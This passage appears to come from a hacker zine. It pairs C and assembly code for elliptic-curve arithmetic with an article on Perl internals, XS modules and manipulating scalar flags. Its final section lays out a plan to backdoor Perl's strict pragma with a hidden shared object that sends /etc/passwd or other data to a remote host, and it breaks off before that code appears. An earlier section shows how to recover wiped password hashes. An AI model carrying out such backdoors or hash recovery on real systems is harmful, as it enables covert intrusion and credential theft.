= -j; } memcpy(x,v,SIZE_BYTES); lshift(x,j); polyAddTo(u,x); // u = u + v>>j memcpy(x,f,SIZE_BYTES); lshift(x,j); polyAddTo(g,x); // g = g + f>>j goto inv_loop; inv_done: memcpy(r, g,SIZE_BYTES); return r; } __declspec(naked) word* __fastcall polyAddTo(word* a, word* b) { __asm { mov edi, ecx mov ecx, SIZE_WORDS _add_to_loop: mov eax, [edx+4*ecx-4] xor [edi+4*ecx-4], eax loop _add_to_loop mov ecx, edi ret } } word* __fastcall polyAdd(word* c, word* a, word* b) { __asm { mov ebx,ecx mov esi,b mov ecx, SIZE_WORDS _add_loop: mov eax, [edx+4*ecx-4] xor eax, [esi+4*ecx-4] mov [ebx+4*ecx-4], eax loop _add_loop } } _declspec(naked) void __fastcall lshift(word* a, word n) { __asm { test edx,edx jnz _lshift_nonzeroshift ret _lshift_nonzeroshift: mov edi,ecx mov esi,edi mov eax,edx shr eax,3 test eax,eax je _lshift_go mov ecx, SIZE_BYTES sub ecx, eax js _lshift_zero add edi, eax _lshift_preloop: dec ecx mov bl, byte ptr[esi+ecx] mov byte ptr [edi+ecx], bl test ecx, ecx jne _lshift_preloop mov ecx, eax _lshift_zloop: mov byte ptr [esi+ecx-1],0 loop _lshift_zloop ;; add esi, eax shl eax, 3 sub edx, eax jz _lshift_done _lshift_go: mov ecx,SIZE_WORDS mov edi,esi clc _lshift_subloop: rcl dword ptr [edi], 1 inc edi inc edi inc edi inc edi loop _lshift_subloop dec edx jne _lshift_go _lshift_done: ret _lshift_zero: mov ecx,SIZE_BYTES _lshift_zloop2: mov byte ptr [esi+eax],0 loop _lshift_zloop2 ret } } _declspec(naked) void __fastcall lshift2(word* a, word n) { __asm { test edx,edx jnz _lshift2_nonzeroshift ret _lshift2_nonzeroshift: mov edi,ecx mov esi,edi mov eax,edx shr eax,3 test eax,eax je _lshift2_go mov ecx, SIZE_BYTES2 sub ecx, eax js _lshift2_zero add edi, eax _lshift2_preloop: dec ecx mov bl, byte ptr[esi+ecx] mov byte ptr [edi+ecx], bl test ecx, ecx jne _lshift2_preloop mov ecx, eax _lshift2_zloop: mov byte ptr [esi+ecx-1],0 loop _lshift2_zloop ;; add esi, eax shl eax, 3 sub edx, eax jz _lshift2_done _lshift2_go: mov edi, esi mov ecx, SIZE_WORDS2 clc _lshift2_subloop: rcl dword ptr [edi],1 inc edi inc edi inc edi inc edi loop _lshift2_subloop dec edx jne _lshift2_go _lshift2_done: ret _lshift2_zero: mov ecx,SIZE_BYTES2 _lshift2_zloop2: mov byte ptr [esi+eax],0 loop _lshift2_zloop2 ret } } _declspec(naked) void __fastcall rshift(word* a, word n) { __asm { mov edi,ecx mov esi,edi mov eax,edx shr eax,3 test eax,eax je _rshift_go push eax mov ebx, SIZE_BYTES sub ebx, eax js _rshift_zero xor ecx, ecx add edi, eax _rshift_preloop: mov al, byte ptr[edi+ecx] mov byte ptr [esi+ecx], al inc ecx cmp ecx, ebx jl _rshift_preloop mov edi,esi add edi,ebx pop ecx mov eax,ecx _rshift_zloop: mov byte ptr [edi+ecx-1],0 loop _rshift_zloop shl eax, 3 sub edx, eax jz _rshift_done _rshift_go: mov ecx,SIZE_WORDS mov edi,esi sub edi,4 shr dword ptr [edi+4*ecx],1 dec ecx _rshift_subloop: rcr dword ptr [edi+4*ecx], 1 loop _rshift_subloop dec edx jne _rshift_go _rshift_done: ret _rshift_zero: mov ecx,SIZE_BYTES _rshift_zloop2: mov byte ptr [esi+eax],0 loop _rshift_zloop2 ret } } word* polyGen() { return calloc(SIZE_WORDS,sizeof(word)); } word* polyRand() { register int i; register word* p = calloc(SIZE_WORDS,sizeof(word)); for (i=SIZE_WORDS-1;i>=0;i--) p[i] = (rand()<<16) | rand(); p[SIZE_WORDS-1] &= EMPTY_MASK; return p; } int deg(word *a) { __asm { mov edx, a mov ecx, SIZE_WORDS _deg_loop: mov ebx, [edx+4*ecx-4] test ebx,ebx jnz _deg_done loop _deg_loop xor eax,eax jmp _deg_zero _deg_done: finit push 1 fild dword ptr [esp] mov dword ptr [esp],0 push ebx fild qword ptr [esp] fyl2x fstcw word ptr [esp] ; round down fstcw word ptr [esp+2] and word ptr[esp],0xF3FF or word ptr[esp], 0x400 fldcw [esp] frndint fldcw [esp+2] fistp qword ptr [esp] pop ebx pop eax mov eax,32 dec ecx mul ecx add eax,ebx inc eax _deg_zero: } } __declspec(naked) int __fastcall polyCmp(word* a, word* b) { __asm { mov edi, ecx ; edi=a/edx=b xor eax, eax mov ecx, SIZE_WORDS __loop_cmp: mov ebx, [edi+ecx*4-4] ; ebx = a[n] mov esi, [edx+ecx*4-4] ; esi = b[n] test ebx,ebx jz __a_n_zero test esi,esi jnz __b_n_notzero inc eax ret __b_n_notzero: cmp ebx, esi jz __next_cmp jl __lesser_cmp inc eax ret __lesser_cmp: dec eax ret __next_cmp: loop __loop_cmp ret __a_n_zero: test esi,esi jz __next_cmp dec eax ret } } __declspec(naked) int __fastcall polyIsZero(word* a) { __asm { mov edi, ecx ; edi=a/edx=b xor eax, eax mov ecx, SIZE_WORDS __iszero_loop: cmp [edi+ecx*4-4],0 jne __is_not_zero loop __iszero_loop inc eax __is_not_zero: ret } } word* dup(word* a) { register word* b = polyGen(); memcpy(b,a,SIZE_BYTES); return b; } ----------------------------------------------------------------------- #ifndef _CURVE_H #define _CURVE_H #include "binfields.h" // We will use, by default, the Koblitz Curve // y2 + xy = x3 + 1 word* pointMul(word* R, word* k, word* P); word* pointAdd(word* R, word* P, word* Q); word* pointDbl(word* R, word* P); word* pointNeg(word* P); word* pointZero(word* P); int isZero(word* P); int isValidPoint(word* P); int pointCmp(word* P, word* Q); word* pointDup(word* P); word* pointGen(); word* pointGenZero(); #endif ----------------------------------------------------------------------- #include #include #include "curve.h" #define Y(__P) (&__P[SIZE_WORDS]) #define X(__P) __P word PGEN[]= { 0xA01C8972,0xE2945283,0x4DCA88C7,0x988B4717,0x494776FB,0xBBD1BA39, 0xB4CEB08C,0x47DA304D,0x93B205E6,0x43709584,0x01841CA4,0x60248048, 0x0012D5D4,0xAC9CA297,0xF8103FE4,0x82189631,0x59923FBC,0x026EB7A8, 0x3EF1C7A3,0x01CD4C14,0x591984F6,0x320430C8,0x7BA7AF1B,0xB620B01A, 0xF772AEDC,0x4FBEBBB9,0xAC44AEA7,0x9D4979C0,0x006D8A2C,0xFFC61EFC, 0x9F307A54,0x4DD58CEC,0x3BCA9531,0x4F4AEADE,0x7F4FBF37,0x0349DC80 }; int isValidPoint(word* P) { // y2+xy=x3+1 word t[SIZE_WORDS] = {0}, l[SIZE_WORDS] = {0}; polyAdd(t,X(P),Y(P)); polyMul(t,t,Y(P)); // left side polySqr(l,X(P)); polyMul(l,l,X(P)); l[0] ^= 1; // right side return !polyCmp(t,l); } word* pointDup(word *P) { return memcpy(malloc(SIZE_WORDS2*sizeof(word)),P,SIZE_BYTES2); } int pointCmp(word* P, word* Q) { switch (polyCmp(X(P),X(Q))) { case 1: return 1; case -1: return -1; default: return polyCmp(Y(P),Y(Q)); } } word* pointGen() { word* P = malloc(SIZE_WORDS2 * sizeof(word)); return memcpy(P,PGEN,SIZE_BYTES2); } word* pointGenZero() { word* pt = calloc(SIZE_WORDS2, sizeof(word)); pt[SIZE_WORDS-1] = 1 << 31; return pt; } int isZero(word* P) { return (P[SIZE_WORDS-1]>>31); } word* pointZero(word* P) { memset(P,0,SIZE_BYTES2); P[SIZE_WORDS-1] = 1 << 31; return P; } word* pointDbl(word* R, word* P) { word t1[SIZE_WORDS] = {0}; word t2[SIZE_WORDS]; if (isZero(P)) return (R==P)?R:memcpy(R,P,SIZE_BYTES2); else if (!polyCmp(t1,P)) return pointZero(R); polyDiv(Y(R),Y(P),X(P)); polyAddTo(Y(R),X(P)); R[SIZE_WORDS] ^= 1; polySqr(t2,X(P)); // t2 = x2 polyInv(t1,t2); polyAddTo(t1,t2); // t1 = x' polyMul(Y(R),Y(R),t1); polyAddTo(Y(R),t2); return memcpy(R,t1,SIZE_BYTES); } word* pointNeg(word* P) { if (isZero(P)) return P; polyAddTo(Y(P),X(P)); return P; } word* pointAdd(word* R, word* P, word* Q) { word l[SIZE_WORDS], x[SIZE_WORDS], y[SIZE_WORDS]; if (isZero(Q)) { if (R==P) return R; else return memcpy(R,P,SIZE_BYTES2); } else if (isZero(P)) { if (R==Q) return R; else return memcpy(R,Q,SIZE_BYTES2); } else { if (!pointCmp(P,Q)) { return pointDbl(R,P); } else { word* N = pointNeg(pointDup(Q)); if (!pointCmp(P,N)) { pointZero(R); free(N); return R; } else free(N); polyAdd(l, Y(P), Y(Q)); polyAdd(x, X(P), X(Q)); polyDiv(l, l, x); polyAddTo(x,polySqr(y,l)); polyAddTo(x,l); polyAdd(y, x, X(P)); polyMul(y, y, l); polyAddTo(y, x); polyAdd(Y(R), y, Y(P)); return memcpy(X(R),x,SIZE_BYTES); } } } word* pointSub(word* R, word* P, word* Q) { word* N = pointNeg(pointDup(Q)); pointAdd(R,P,N); free(N); return R; } word* pointMul(word* R, word* k, word* P) { register int i; word* Q = pointDup(P); for (i=deg(k)-1;i>=0;i--) { pointDbl(Q,Q); if ((k[i/32]>>(i%32))&1) pointAdd(Q, Q,P); } memcpy(R,Q,SIZE_BYTES2); free(Q); return R; } [==============================================================================] [-------------------------------[ Breaking Perl ]------------------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/ _`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### By: zshzn ################ Email: zshzn@hackaholic.org *############* "T######T" -[ 0.0 ]-------------------------------------------------------[ Contents ]----- 1.0 Introduction 2.0 The SV 2.1 Introduction to SVs 2.2 Dual Types Challenge 2.3 Data Recovery Vulnerabilities 3.0 XS 3.1 Introduction to XS 3.2 Using XS 3.3 Breaking undef 3.4 The Perl API 3.5 Evil strict 4.0 Magic 4.1 Introduction to Magic 4.2 Changing Special Variables 4.3 Our Own Magic 4.4 A Magic JAPH 5.0 Closing 5.1 More Topics 5.2 Sources 5.3 Shouts 6.0 Appendix - Flag.xs -[ 1.0 ]---------------------------------------------------[ Introduction ]----- This article is about perl internals. This article will teach you about how things work and how to manipulate them. Hopefully this article will inspire you to teach yourself further and take up the hobby. If you do not code Perl, this could be a good time to start. If you do code Perl, this could be a very important series of lessons that could give you a greater understanding of the language. The first thing to remember about Perl is that it is built with C. It is a series of extensions creating a new language. C programmers maintain that anything that can be done in Perl can be done in C. This is rightly so, and backed by the very nature of perl, the fact that it is, after all, written in C. However, any Turing-complete language can do what either can. Perl is significantly different from C to an extent that it must be viewed as unique. However, the connection is central to this article, and it is this connection that we explore. Within the context of this topic I refer to a "user" as someone using Perl to program. The user gets to use Perl as a tool, without knowing how it is implemented and how it works. You only need to know how to manage the features available. Perl embraces a level of abstraction. This abstraction lives in its core and is used through every increasing level. To emulate Perl directly in C, this abstraction has to be done. To emulate advanced features one either implements directly, uses a library, or does not implement at all. One example is using regular expressions. In C you can use PCRE, Perl Compatible Regular Expressions. It's a rather large library. This represents a direct abstraction away from the simplicity of C. However, one is still very limited. Although PCRE allows much more than one would sensibly implement individually in C, it falls far short of Perl's regular expressions. Usually, a C coder will not use regular expressions at all, and will limit their programming to the tools they have available. C lacks the elemental high level required to allow regular expressions that are more than a shadow of Perl. -[ 2.0 ]---------------------------------------------------------[ The SV ]----- ---[ 2.1 ]-----------------------------------------[ Introduction to SV's ]----- So how does Perl do it? The very base of Perl is the SV. An SV is a Scalar Value. It is a structure that can hold a selection of a type of values, including various other relevant data. In basics, SVs can store integers, doubles, and strings. The code managing SVs can be found in sv.h and sv.c, which makes up a large percentage of the overall perl code. Taken directly from sv.h: struct STRUCT_SV { /* struct sv { */ void* sv_any; /* pointer to something */ U32 sv_refcnt; /* how many references to us */ U32 sv_flags; /* what we are */ }; Please note that I am taken definitions from perl 5.8.8, the latest stable version of perl. I realize that between then and now, perl 5.9.3, the current development version, they have messed with some things, and overall structures are a little bit more complicated. Also note that I refer to it as "perl" when talking about the source code and application. The language is "Perl", capitalized. I may capitalize perl to start a sentence. I also may at times make the mistake of extracting from perl 5.9.3 instead of 5.8.8, depending on which machine I am on and my level of patience. ====================================================== Obscure Reference Note == Please note that perl 5.9.3 does NOT mean we are seven updates away from perl 6. You know what we are seven updates away from? perl 5.10. And it looks to be coming along pretty nicely. Perl 6 is kind of here already, in PUGS form, but the official, Parrot-based form is a while off, if it is coming at all. ================================================================================ Obviously sv_refcnt is just a number, usually 1. When this hits 0 we expect our SV to disappear, it no longer exists to us. If some secondary SV is a reference to an original one, we can make sure our SV doesn't disappear when we still want it. This is Perl's reference-based garbage collection. The first three bytes of sv_flags hold 24 one-bit flags. These define what types of data it holds, how we are to use it, and a lot of little things that usually aren't used. They are #define'd in quite an ugly block early in sv.h, and I shalln't repeat them here in original form for that reason. The last byte of sv_flags represents the type of SV. This is crucial for sv_any. IVs are integers, NVs are doubles, RVs are references, PVs are strings. PVIV/PVNV are combinations, and everything else you don't want to worry about right now. typedef enum { SVt_NULL, /* 0 */ SVt_IV, /* 1 */ SVt_NV, /* 2 */ SVt_RV, /* 3 */ SVt_PV, /* 4 */ SVt_PVIV, /* 5 */ SVt_PVNV, /* 6 */ SVt_PVMG, /* 7 */ SVt_PVBM, /* 8 */ SVt_PVLV, /* 9 */ SVt_PVAV, /* 10 */ SVt_PVHV, /* 11 */ SVt_PVCV, /* 12 */ SVt_PVGV, /* 13 */ SVt_PVFM, /* 14 */ SVt_PVIO /* 15 */ } svtype; sv_any is a pointer towards more data. This data is usually another structure. Before we get directly into sv_any, I would like to explain and discuss a little bit more. Despite the ability that an SV represents, we can already see the resource use involved. Even discarding the other side of sv_any for the moment, we are allocating 12 bytes to this SV. Four bytes alone to a variable that usually just holds the value 1. It may seem outragious in the case of an integer, but it scales well. Let's give an example of an SV. For debugging output in Perl I use Devel::Peek::Dump and otherwise I use Perl_sv_dump, which is the precise function wrapped by Dump. Here's an example of a simple integer. bash-3.00$ perl -MDevel::Peek -e '$c = 12; print Dump $c' SV = IV(0x81420ec) at 0x812f4d8 REFCNT = 1 FLAGS = (IOK, pIOK) IV = 12 The SV type, as stored in the last byte of sv_flags, holds the value 1, representing an IV, which is an integer value. The flags set are IOK (integer OK) and pIOK (private integer OK, don't worry about this one yet). The actual number it stores is 12. Here, have a string example. bash-3.00$ perl -MDevel::Peek -e '$c = "wer"; print Dump $c' SV = PV(0x812f9d8) at 0x812f4d8 REFCNT = 1 FLAGS = (POK, pPOK) PV = 0x813d128 "wer"\0 CUR = 3 LEN = 4 This one is a PV, Pointer Value (String Value, SV, is already taken obviously). Type value 4. Flags POK and pPOK. Value "wer", and it is null terminated to be safe for C functions. CUR is the length of the data itself, LEN is the length of the data space delegated for it. This will not always be just one more than CUR. Let's get into some fun. bash-3.00$ perl -MDevel::Peek -e '$c = 12; $c = "wer"; print Dump $c' SV = PVIV(0x81309e8) at 0x812f4d8 REFCNT = 1 FLAGS = (POK, pPOK) IV = 12 PV = 0x813d130 "wer"\0 CUR = 3 LEN = 4 Notice anything odd? We have BOTH an IV and a PV. This is not an IV or a PV, this is a PVIV, type 5. However, it will always be treated as a string, because POK is set, and IOK is not. ====================================================== Obscure Reference Note == I could use $a as a test variable. Or $b. But I am trying to avoid that. Why? Because they are special. Not very special, but I don't want to get caught on anything funky. And I also do not want to confuse any readers, who might explain odd behavior, incorrectly, on the fact that I am using $a or $b. $a and $b are used internally by sort(), and the key difference is that they don't have to be declared with "my" to work under strict. Otherwise they are normal. ================================================================================ ---[ 2.2 ]-----------------------------------------[ Dual Types challenge ]----- Recently I tempted people with the following: bash-3.00$ perl test.pl This is what you're about to see: use strict; use Flag qw(int_me); my $i; print "Insert a number: "; chomp($i = int()); $i = "This is a string"; int_me($i); print '$i = ', $i, "\n"; Insert a number: 1337 $i = 1337 bash-3.00$ Please note that the above, excluding the prompt lines, is the output of a program. The program itself is that code, plus a bit of code to print that. In the above case you are prompted for a number, and then the program prints it. At first people ask where they can find Flag. I tell them they can't, it's homegrown, after all that is the trick. They wonder if it is a syntax trick, or if int_me() just assigns 1337 to $i. However I assure them it is neither. I allow the user to submit an integer to $i. I have to int() this, because otherwise returns a string of course and this ends up in PV and $i is a PV. Due to the int() $i is a regular IV, with an IV value and flags IOK and pIOK. I then change the value of $i. Then I do something special in int_me(), and suddenly not only is $i a number, but is the exact number the user inputted originally, despite the impression that that number should have disappeared. bash-3.00$ perl -MDevel::Peek -e '$c = ; print Dump $c' 1337 SV = PV(0x812f9d8) at 0x812f4d8 REFCNT = 1 FLAGS = (POK, pPOK) PV = 0x81431d8 "1337\n"\0 CUR = 5 LEN = 80 bash-3.00$ perl -MDevel::Peek -e '$c = int(); print Dump $c' 1337 SV = IV(0x81420f4) at 0x812f4d8 REFCNT = 1 FLAGS = (IOK, pIOK) IV = 1337 The above examples show the necessity behind the int() wrapper around . What int_me() does is change flags from POK to IOK, and Perl will thereafter access the IV value instead of the PV value. This cannot be done in Perl itself, how I do so will be explained later. By the way, I of course wrote stringify() and double_or_nothing() to go with int_me(). All of my XS examples in this document can be found in Appendix A. Why do we save the excess values, especially if we cannot use the old values again? Because otherwise we would have to reallocate the structure, and that usually would not be worth it. It would be worth it perhaps when going from a very long string to something else, however doing that itself is a bad use of a variable, both for clarity and for this reason. As well, the memory freed might not be useful anyways. ====================================================== Obscure Reference Note == Yet again, a perl user should not have to worry about perl internals. Perl is a high-level language, the user optimally should not have to be aware of how everything is implemented. In Perl, things work as expected. So, using a very long string in a variable and then assigning that variable to a small string or a number, thereby using excessive memory, should not be held against a user on that basis. The user does not have an obligation to know that. However, as mentioned above, it could perhaps be held against the user for poorly using variables, or doing so in an illogical fashion. ================================================================================ So back to sv_any. It is just a pointer towards more data, the data structure applicable. In the above dual variable case, a PVIV system, this is the structure: struct xpviv { char * xpv_pv; /* pointer to malloced string */ STRLEN xpv_cur; /* length of xpv_pv as a C string */ STRLEN xpv_len; /* allocated size */ IV xiv_iv; /* integer value or pv offset */ }; Very simple. As you can realize, an xpv is just that minus the IV field. These structures can easily be interpreted by Perl functions, because they recognize the type value of the sv_flags member of the host structure. As well, they are generally designed as extensions of more base SV types. SVs can scale to hold numbers, strings, globs, and a shitload of weird things that you do not want to trouble your mind over right now. The other main Perl data types are AVs and HVs. Those are Array Values and Hash Values respectively. Both are more complicated structures, but in essence they act as lists of SVs. The SV is the base of the language, and it in itself is what makes Perl a much higher level language than C. ---[ 2.3 ]--------------------------------[ Data Recovery Vulnerabilities ]----- You may be reading this with some expectation of something to gain, security-wise. I mean, why learn something if it can't help you hack? Fun? What's that? Anyways. There are some obscure tricks that could come up from this unexpected behavior. If you have code access, even limited, you might be able to "use Devel::Peek; print Dump $important_var;". A good example could be one of the many Perl shells out there. Perhaps it drops privileges after authorization but not the current interpreter, naturally. Perhaps there are some variables that have an important value that they thought they wiped. print "login: "; chomp(my $user = ): print "password: "; chomp(my $password = ); $hashed = get_hash($user); set_user($user) if hash($password, $hashed); $hashed = 0; #bye bye hashed password from /etc/shadow! set_privs_to($user); print $motd; Something along that line, just not as silly and a bit more complicated. ====================================================== Obscure Reference Note == psh, the Perl SHell, the popular one that occupies sourceforge under that name, is a highly advanced shell. It includes over 10,000 lines of Perl and has been long in the making. Do not expect such simple code or foolish mistakes from them. I am just giving examples here. Then again, I'm not giving an express guarantee that they don't have foolish mistakes. Just don't expect it. ================================================================================ Obviously you can access $hashed and recover the root password hash, regardless of success or not. Naturally you might want to avoid this by undef()ing your variable first. In this case, that works. However, it turns out undef() doesn't entirely remove the variable, nor the IV or NV value, nor the type value, just the PV and any flags. So if it was an important number that was saved, say, in the event of RSA key generation, it could be recoverable. bash-3.00$ perl -MDevel::Peek -e '$c = 5; undef $c; print Dump $c' SV = IV(0x81420f4) at 0x812f4d8 REFCNT = 1 FLAGS = () IV = 5 bash-3.00$ perl -MDevel::Peek -e '$c = 5; $c = 5**50; undef $c; print Dump $c' SV = PVNV(0x8131e08) at 0x812f4d8 REFCNT = 1 FLAGS = () IV = -1 NV = 8.88178419700125e+34 PV = 0 Funky shit eh? You'd think they would go all the way. If you really, really, want to clear the values in a variable, here is some code that does so. But you'll have to read further to find out how to use it. SV * sv_my_clear(scalar) SV* scalar CODE: sv_setiv(scalar, 0); sv_setnv(scalar, 0); sv_setpv(scalar, ""); scalar->sv_flags = 0; Or you can use the Perl API, which is a smarter idea, with sv_clear or sv_free. Alternatively, if you need to revert the value back to a string or an integer, you would need enough access to setup a relevant module (more on this below), and use int_me(), stringify(), or something of that sort. These might seem obtuse. Very obtuse. But they are the kind of tricks that it is good to have in your pocket. Those tricks add up, and eventually pay themselves back. -[ 3.0 ]-------------------------------------------------------------[ XS ]----- ---[ 3.1 ]-------------------------------------------[ Introduction to XS ]----- is it my fault that we're all about guts now? XS is, well, a glue language of its own. Basically it is a way to use C in Perl, and XS is mostly C code wrapped with flags telling xsubpp how to put it together. We use XS to do two things. The first is to write functions in C for things that we would rather not do in Perl, yet we still need to use in Perl. The second is to mess with Perl internals themselves. The xsubpp compiler generates a library that can be loaded in Perl modules. XS converts Perl arguments to C arguments, executes the C function, and returns values to Perl. It can do a few tricks too, but that is the gist of it. I would not want to keep you waiting. Have some more XS, the card up the sleeve of the int_me() trick. SV* int_me(SV* scalar) CODE: SvIOK_only(scalar) Most of that is self-explanatory. You may ask, "but zshzn, doesn't this just wrap another function of yours, SvIOK_only(SV* scalar), and you really haven't shown us anything???" and I will respond "no". SvIOK_only is an internal function, part of the Perl API, and I will get to that later. The line-break after "SV*" is needed. Paramaters can be put in either that format or K&R style. The earlier example (sv_my_clear) is easy to explain as well. I use three internal functions to safely change the IV, NV, and PV values stored, and then I directly set sv_flags to 0. You may want a slightly more volumous example. Below is a complete file, we will call it Flag.xs. This is my Flag module. Calm down Stephen Harper, I said FLAG module. ====================================================== Obscure Reference Note == Stephen Harper is, at the time of writing, the current Prime Minister of Canada. He is a bit more "right wing" than most successful Canadian politicians. He draws comparisons to George Bush Jr. here. However he is much less "right wing" than the centre-left of the American Democratic party. Regardless, jokes abound. In a recent television commercial, famous Canadian political comedian Rick Mercer said "Today is Flag day. Calm down Stephen Harper, I said FLAG day." suggesting that Stephen Harper would be upset by a supposed "Fag day" supporting homosexual rights. Or something. Yea, the joke wasn't too good in the first place, and my copy is just that much worse. But if I didn't say anything about it here, you might be lead to guess that I wrote something witty and specific. So just go with that. ================================================================================ #include "EXTERN.h" #include "perl.h" #include "XSUB.h" #include #define DEBUG 0 MODULE = Flag PACKAGE = Flag SV * sv_rm_flag(scalar, flag) SV* scalar char* flag CODE: char flags[24][10] = { "PADBUSY", "PADTMP", "PADMY", "TEMP", "OBJECT", "GMAGICAL", "SMAGICAL", "RMAGICAL", "IOK", "NOK", "POK", "ROK", "FAKE", "OOK", "BREAK", "READONLY", "IOKp", "NOKp", "POKp", "SCREAM", "AMAGIC", "SHAREKEYS", "LAZYDEL", "VALID" }; int i, j; for (i = 0; i < 24; i++) { if ( strEQ(flag, flags[i]) ) { j |= (int)pow(2,i+8); j = ~j; scalar->sv_flags &= j; break; } } if ( DEBUG ) { printf("[ %u ]\n",scalar->sv_flags ); Perl_sv_dump(scalar); } Part of the way that is formatted is crucial. Everything before the first MODULE flag is raw C and you can write direct C functions, and everything afterwards has to be XS-style. There has to be some spacing before the first line of code in the CODE section. There doesn't always have to be a CODE tag but I like to include it. Empty lines are not always allowed, thus my tight packing. The code itself is simple enough, so I have abstained from commenting. If I was to comment, I can use Perl's pound sign for a whole line, or C commenting otherwise. Mostly that is C, very direct. strEQ() is another Perl API function, similar to strcmp(). What this function, sv_rm_flag(), does, is remove a specific flag. Based on the string you enter, it removes the corresponding flag. The included headers are essential for XS, except for math.h which is only needed for pow() in this case. I define the module and package as Flag, because I wanted to mess with SV flags. ---[ 3.2 ]-----------------------------------------------------[ Using XS ]----- You may be wondering how to actually write and include XS code. As mentioned above, you make a .so that can be dynamically loaded into Perl. You could also create a static library and build Perl again with it, if you really wanted to. We load this dynamic library with a Perl module. We use the program h2xs, in this case, mostly to build a makefile for us. h2xs means header to XS, it is designed to take a C header file and create XS for us. Then we could mess with that code to make it more Perl-friendly. For example to put return values directly on the Perl stack, or to work directly with SVs instead of other variables. There are lots of reasons why one would want to modify C code to use it with Perl. In our case, however, we are not doing that. We are creating our XS entirely. So we just do not provide h2xs with a header to work from. h2xs -A -n Flag Now we have a directly, ./Flag, with some stuff in it. We put our XS code in Flag.xs and our module is Flag.pm package Flag; require Exporter; require DynaLoader; our @ISA = qw(Exporter DynaLoader); @EXPORT_OK = qw / int_me /; our $VERSION = '0.01'; bootstrap Flag; 1; That there is my Flag.pm. For those of you not familiar with Perl modules, almost everything there is very normal. We define our package, for the Perl namespace. We use Exporter, which allows us to export easily to another namespace. Consider this how we get our subroutines "out" of the module and into your program. @EXPORT is an array of symbols to export automatically, @EXPORT_OK is a list of symbols to export on request. It is considered bad form most of the time to export by default. We define a version. The "1;" at the end of the module is important, it is like "return 1;", and a module must return success. In a regular module we would have our subroutines between the meta-information and the "1;" at the end. In this case, however, we use bootstrap() from DynaLoader, which does a lot of work in itself, and ultimately calls dl_load_file($filename, $flags) which is implemented in C. This is what actually loads our object file. perl Makefile.PL make If we want to use this for testing we can create a little .pl in our working Flag dir (or do proper tests in /t): use ExtUtils::testlib; use Flag; $a = 1234; $a = "omg hax"; Flag::int_me($a); print $a; You know, that kind of thing. If you want to use it natively in your Perl scripts, make install, or manually export the files where you need them. For the .pm that is in @INC directories and the .so needs to find it's way into a proper auto/ directory, off an @INC. ---[ 3.3 ]-----------------------------------------------[ Breaking undef ]----- Hey, let's take undef, and break it. Oh yeah. undef is defined as this in embedvar.h: #define PL_sv_undef (vTHX->Isv_undef) and as this in perlapi.h: #define PL_sv_undef (*Perl_Isv_undef_ptr(aTHX)) So you can be assured it is one of those two. Either way it seems to emulate a small SV. This is used a lot in perl, in much the same way we do in Perl: if (sv == &PL_sv_undef) { or sv = &PL_sv_undef; By the way, although in my examples I tend to name my SVs as 'scalar', perl usually uses 'sv'. Take a look at its organs: Perl_sv_dump((SV*)&Perl_sv_undef)); SV = NULL(0x0) at 0x812bf98 REFCNT = 2147483439 FLAGS = (READONLY) There are a few things to note ?bout that. First of all, notice that we are quite a bit up memory from our normal variables. Secondly, that's one fucking large REFCNT. That is so it will never disappear on us. And, the only flag set is readonly, and the type is 0, presumably to make sure no functions fuck with it when it comes around. The address means that this is defined much earlier in our process, and that we cannot add to it in-place because we overwrite and segfault. Thus, my first attempt didn't work: ((SV*)&PL_sv_undef)->sv_flags = 67311012; sv_setpv((SV*)&PL_sv_undef, "happy"); So what shall we do? We'll create a new SV and point PL_sv_undef at it. SV* sv_break_undef() CODE: SV* mirror = newSVpv("happy", 5); mirror->sv_refcnt = ((SV*)&PL_sv_undef)->sv_refcnt; /* I could be more naughy and ignore this too, but hey, undef is destroyed either way */ PL_sv_undef = *mirror; Great! Now I can break any code that uses undef in any way. I like to break code and see what happens. ---[ 3.4 ]-------------------------------------------------[ The Perl API ]----- Now you know enough XS to know how to do things. Especially if you know C. You know how to use that XS in your Perl program. And you have enough knowledge of Perl datatypes to mess with them. You're all set! But wait, you aren't. Here we have to have a little talk about the Perl API. You might want to, for example, change an SV's data or something of that sort. However, doing so manually, and properly, would require various checks to find out just what kind of data it contains. You and I are likely to mess that up. It's natural. Especially with a gross underestimation of the complexity and variety of SV types. Thankfully, this work has been done for us. The application has a very extensive API, a lot of it built up upon various levels, to make things very easy for developers. There really is a lot that needs to be done to make sure things work right. I personally might bypass this in a lot of the code here, but I'm also mostly interested in exploring and breaking. For serious work, the Perl API is perfect. I would just like to detail some relevant functions. You can create a new SV like this: SV* scalar = newSV(0); // empty, allocated zero bytes SV* scalar = newSV(100); // empty, 100 allocated bytes SV* scalar = newSViv(100); // new IV (integer), with value 100 SV* scalar = newSVpv("happy", 5); // if you still need an explanation... We can change current values similarly: sv_setiv(scalar, 100); sv_setpv(scalar, "happy"); We access the values as so: SvIV(scalar); SvNV(scalar); //etc STRLEN len; SvPV(scalar, len); Please note that you provide a STRLEN type and SvPV will assign the length of the string into it. Note that STRLEN == MEM_SIZE == Size_t. Here, better example: STRLEN length; printf("My string is \"%s\" and its length is %d\n", SvPV(scalar, length), length); When it comes to reference counts, we can modify them like this: SvREFCNT(scalar); // returns current value SvREFCNT_inc(scalar); // increase by one SvREFCNT_dec(scalar); // decrease by one Notice that you are expected to alter reference counts in single increments or decrements. Darn. Something that hasn't come up here yet, but which is important once you really get into XS, is the mortality of variables. Basically we don't want to have the equivalent of a memory leak in a function, where we temporarily use a variable but it's reference count doesn't expire due to odd circumstances. SV* scalar = sv_newmortal(); // create a new mortal variable sv_2mortal(scalar); // mortalize an existing SV SV* scalar = sv_mortalcopy(otherscalar); // Make a mortal copy of an existing scalar We have functions to manipulate type, as seen before. SvIOK(scalar); // returns true if is IOK SvIOK_on(scalar); // set the IOK (and pIOK) flag on SvIOK_only(scalar); // set IOK (and pIOK) on and turn others off That is about as far as I want to get into the API at the moment. ---[ 3.5 ]--------------------------------------------------[ Evil strict ]----- Time for some more fun. This really does not involve much Perl or Perl API. We are going to make strict call home. strict is the common pragma that any decent Perl program calls immediately. In this example case, we will get it to connect, on our owned box, to somewhere special and dump /etc/passwd. Naturally, you can insert DNS code if you want and send a file other than /etc/passwd, presumably something useful. Imagine you have some sniffing script running and you want to send out its latest data. Or something. We are hiding malicious code in a loadable object that we will have called whenever someone uses strict. It might not be the cleanest method, but it is less noticable than a cron job or any number of other methods, and our evil code is relatively hidden, in a .so. Of course we could just write the code in Perl in strict.pm, but that would be more obvious. This is our XS: #include 